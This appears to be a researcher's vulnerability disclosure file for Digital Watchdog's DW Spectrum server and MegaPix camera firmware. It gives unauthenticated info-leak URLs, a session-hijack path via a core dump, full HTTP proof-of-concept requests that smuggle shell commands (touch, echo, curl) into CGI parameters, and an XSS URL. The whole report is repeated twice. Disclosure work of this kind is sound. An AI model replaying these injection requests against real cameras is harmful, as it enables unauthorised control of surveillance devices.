secgrant/dw_vulns.txt Secret

## dw_vulns.txt
The following issue was found on DW Spectrum server software ver 4.2.0.32842
Information Disclosure:
1. API call displays internal paths, IPs, OS version and architecture.
http://<SERVER IP>:7001/api/moduleInformation

All issues below were found on A7.2.2_20211029 firmware of MegaPix IP Camera by Digital Watchdog.

The following issues were found through unauthenticated URLs:

Information Disclosure:
1. Web files display internal paths and scripts, software versions (CWE-201)
http://192.168.1.80/plugin_info_list.xml
http://192.168.1.80/plugin/plugin_web.conf
http://192.168.1.80/plugin/port.conf

2. Information disclosure and session hijacking through core log (CWE-201)
	Step 1. generate 500 error from authenticated by going to 192.168.1.80/cgi-bin/result?msubmenu=event&action
	Step 2. get core file by going to 192.168.1.80/cgi-bin/core
	Step 3. Use session token information from error event to log into admin pages


The following issues were found through authenticated URLs:

1. Command injection on curltest.cgi web file
	http://192.168.1.80/cgi-bin/admin/curltest.cgi
	-injectable on test[] parameters smtp_addr,smtp_port,sender,receiver,id, and pass

	POST /cgi-bin/admin/curltest.cgi?smtp HTTP/1.1
	Host: 192.168.1.80
	User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
	Accept: */*
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
	X-Requested-With: XMLHttpRequest
	Content-Length: 299
	Origin: http://192.168.1.80
	Authorization: Digest username="admin", realm="IP Camera", nonce="5fdb55be:74a954dee4e18d4598f921815cfda122", uri="/cgi-bin/admin/curltest.cgi?smtp", response="36f619b490b3f5b6cc381f3c80249f2c", qop=auth, nc=0000007d, cnonce="c0b5e7ad8a3ce8b7"
	Connection: close
	Referer: http://192.168.1.80/cgi-bin/admin/setup_main.cgi

	test%5Benabled%5D=1&test%5Bsmtp_addr%5D=192.168.1.5:444';touch%20./test.txt;curl%20--url%20'http://192.168.1.5&test%5Bssl_enable%5D=0&test%5Bsmtp_port%5D=444&test%5Bssl_port%5D=465&test%5Bid%5D=a&test%5Bpass%5D=a&test%5Bsender%5D=test&test%5Breceiver%5D=test&test%5Btitle%5D=hi&test%5Bmessage%5D=hi


2. Command injection on adacph.cgi web file (CWE-94)
http://192.168.1.80/cgi-bin/admin/vca/bia/addacph.cgi
	-injectable on event, id, pluginname, name, and evt_id paramaters

	GET /cgi-bin/admin/vca/bia/addacph.cgi?mod&event=a&id=1&pluginname=;%20echo%20'test'>test.html%20;&name=a&evt_id=a

3. Command injection on license_tok.cgi web file (CWE-94)
http://192.168.1.80/cgi-bin/admin/vca/license/license_tok.cgi
	-injectable on POST guid,license_value, and plugin_info parameters
	POST /cgi-bin/admin/vca/license/license_tok.cgi?getToken HTTP/1.1
	Host: 192.168.1.80
	User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
	Accept: */*
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
	X-Requested-With: XMLHttpRequest
	Content-Length: 96
	Origin: http://192.168.1.80
	Authorization: Digest username="admin", realm="IP Camera", nonce="5fe1c519:e61374f2ea956e03c278894d036fc0ef", uri="/cgi-bin/admin/curltest.cgi?smtp", response="53219d6b6a8afdffb3fbbfd9a17dcf98", qop=auth, nc=0000068c, cnonce="960aed74a9bd1476"
	Connection: close
	Referer: http://192.168.1.80/cgi-bin/admin/setup_main.cgi

	guid='555 http://127.0.0.1;%20echo 'test'>test.html%20;curl -k -d guid=555'&license_value='fff'

4. XSS vulnerability in bia_oneshot.cgi web file (CWE-79)
http://192.168.1.80/cgi-bin/admin/vca/bia/bia_oneshot.cgi?blob=%3Chtml%3E%3Cscript%3Ealert(%27test%27)%3C/script%3E%3C/html%3E
	-file contents injection allows persistent XSS through blob parameter
	The following issue was found on DW Spectrum server software ver 4.2.0.32842
	Information Disclosure:
	1. API call displays internal paths, IPs, OS version and architecture.
	http://<SERVER IP>:7001/api/moduleInformation

	All issues below were found on A7.2.2_20211029 firmware of MegaPix IP Camera by Digital Watchdog.

	The following issues were found through unauthenticated URLs:

	Information Disclosure:
	1. Web files display internal paths and scripts, software versions (CWE-201)
	http://192.168.1.80/plugin_info_list.xml
	http://192.168.1.80/plugin/plugin_web.conf
	http://192.168.1.80/plugin/port.conf

	2. Information disclosure and session hijacking through core log (CWE-201)
	Step 1. generate 500 error from authenticated by going to 192.168.1.80/cgi-bin/result?msubmenu=event&action
	Step 2. get core file by going to 192.168.1.80/cgi-bin/core
	Step 3. Use session token information from error event to log into admin pages



	The following issues were found through authenticated URLs:

	1. Command injection on curltest.cgi web file
	http://192.168.1.80/cgi-bin/admin/curltest.cgi
	-injectable on test[] parameters smtp_addr,smtp_port,sender,receiver,id, and pass

	POST /cgi-bin/admin/curltest.cgi?smtp HTTP/1.1
	Host: 192.168.1.80
	User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
	Accept: /
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
	X-Requested-With: XMLHttpRequest
	Content-Length: 299
	Origin: http://192.168.1.80
	Authorization: Digest username="admin", realm="IP Camera", nonce="5fdb55be:74a954dee4e18d4598f921815cfda122", uri="/cgi-bin/admin/curltest.cgi?smtp", response="36f619b490b3f5b6cc381f3c80249f2c", qop=auth, nc=0000007d, cnonce="c0b5e7ad8a3ce8b7"
	Connection: close
	Referer: http://192.168.1.80/cgi-bin/admin/setup_main.cgi

	test%5Benabled%5D=1&test%5Bsmtp_addr%5D=192.168.1.5:444';touch%20./test.txt;curl%20--url%20'http://192.168.1.5&test%5Bssl_enable%5D=0&test%5Bsmtp_port%5D=444&test%5Bssl_port%5D=465&test%5Bid%5D=a&test%5Bpass%5D=a&test%5Bsender%5D=test&test%5Breceiver%5D=test&test%5Btitle%5D=hi&test%5Bmessage%5D=hi


	2. Command injection on adacph.cgi web file (CWE-94)
	http://192.168.1.80/cgi-bin/admin/vca/bia/addacph.cgi
	-injectable on event, id, pluginname, name, and evt_id paramaters

	GET /cgi-bin/admin/vca/bia/addacph.cgi?mod&event=a&id=1&pluginname=;%20echo%20'test'>test.html%20;&name=a&evt_id=a

	3. Command injection on license_tok.cgi web file (CWE-94)
	http://192.168.1.80/cgi-bin/admin/vca/license/license_tok.cgi
	-injectable on POST guid,license_value, and plugin_info parameters
	POST /cgi-bin/admin/vca/license/license_tok.cgi?getToken HTTP/1.1
	Host: 192.168.1.80
	User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
	Accept: /
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
	X-Requested-With: XMLHttpRequest
	Content-Length: 96
	Origin: http://192.168.1.80
	Authorization: Digest username="admin", realm="IP Camera", nonce="5fe1c519:e61374f2ea956e03c278894d036fc0ef", uri="/cgi-bin/admin/curltest.cgi?smtp", response="53219d6b6a8afdffb3fbbfd9a17dcf98", qop=auth, nc=0000068c, cnonce="960aed74a9bd1476"
	Connection: close
	Referer: http://192.168.1.80/cgi-bin/admin/setup_main.cgi

	guid='555 http://127.0.0.1;%20echo 'test'>test.html%20;curl -k -d guid=555'&license_value='fff'

	4. XSS vulnerability in bia_oneshot.cgi web file (CWE-79)
	http://192.168.1.80/cgi-bin/admin/vca/bia/bia_oneshot.cgi?blob=%3Chtml%3E%3Cscript%3Ealert(%27test%27)%3C/script%3E%3C/html%3E
	-file contents injection allows persistent XSS through blob parameter